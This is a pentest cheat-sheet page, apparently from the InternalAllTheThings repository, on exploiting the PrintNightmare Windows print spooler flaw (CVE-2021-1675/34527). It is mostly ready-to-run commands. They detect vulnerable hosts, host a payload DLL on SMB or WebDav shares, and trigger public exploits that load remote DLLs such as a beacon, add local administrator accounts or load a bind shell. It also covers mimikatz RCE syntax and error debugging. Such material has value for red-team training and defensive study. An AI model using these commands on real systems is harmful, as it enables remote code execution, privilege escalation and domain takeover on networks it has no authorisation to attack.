printnightmare.md (5225B)
1 --- 2 title: "PrintNightmare" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/CVE/PrintNightmare.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/PrintNightmare.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # PrintNightmare 12 13 > CVE-2021-1675 / CVE-2021-34527 14 15 The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`. 16 The exploit will execute the DLL either from the local filesystem or a remote share. 17 18 Requirements: 19 20 * **Spooler Service** enabled (Mandatory) 21 * Server with patches < June 2021 22 * DC with `Pre Windows 2000 Compatibility` group 23 * Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1 24 * Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0 25 26 **Detect the vulnerability**: 27 28 * Impacket - [impacket/rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) 29 30 ```ps1 31 python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' 32 Protocol: [MS-RPRN]: Print System Remote Protocol 33 ``` 34 35 * [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream) 36 37 ```ps1 38 cd ItWasAllADream && poetry install && poetry shell 39 itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 40 docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 41 ``` 42 43 **Payload Hosting**: 44 45 * The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): 46 47 ```ps1 48 python3 ./smbserver.py share /tmp/smb/ 49 ``` 50 51 * Using [3gstudent/Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) (Admin rights required on host): 52 53 ```ps1 54 Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable 55 ``` 56 57 * Using WebDav with [SharpWebServer](https://github.com/mgeeky/SharpWebServer) (Doesn't require admin rights): 58 59 ```ps1 60 SharpWebServer.exe port=8888 dir=c:\users\public verbose=true 61 ``` 62 63 When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll` 64 WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav: 65 66 ```ps1 67 nxc smb -u user -p password -d domain.local -M webdav [TARGET] 68 ``` 69 70 **Trigger the exploit**: 71 72 * [cube0x0/SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) 73 74 ```powershell 75 # require a modified Impacket: https://github.com/cube0x0/impacket 76 python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' 77 python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' 78 ## LPE 79 SharpPrintNightmare.exe C:\addCube.dll 80 ## RCE using existing context 81 SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' 82 ## RCE using runas /netonly 83 SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 84 ``` 85 86 * [calebstewart/Invoke-Nightmare](https://github.com/calebstewart/CVE-2021-1675) 87 88 ```powershell 89 ## LPE only (PS1 + DLL) 90 Import-Module .\cve-2021-1675.ps1 91 Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default 92 Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" 93 Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" 94 ``` 95 96 * [gentilkiwi/mimikatz v2.2.0-20210709+](https://github.com/gentilkiwi/mimikatz/releases) 97 98 ```powershell 99 ## LPE 100 misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll 101 ## RCE 102 misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 103 ``` 104 105 * [outflanknl/PrintNightmare](https://github.com/outflanknl/PrintNightmare) 106 107 ```powershell 108 PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password] 109 ``` 110 111 **Debug informations** 112 113 | Error | Message | Debug | 114 |--------|-----------------------|------------------------------------------| 115 | 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share | 116 | 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. | 117 | 0x180 | unknown error code | Share is not SMB2 | 118 119 ## References 120 121 * [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) 122 * [A Practical Guide to PrintNightmare in 2024 - itm4n - Jan 28, 2024](https://itm4n.github.io/printnightmare-exploitation/)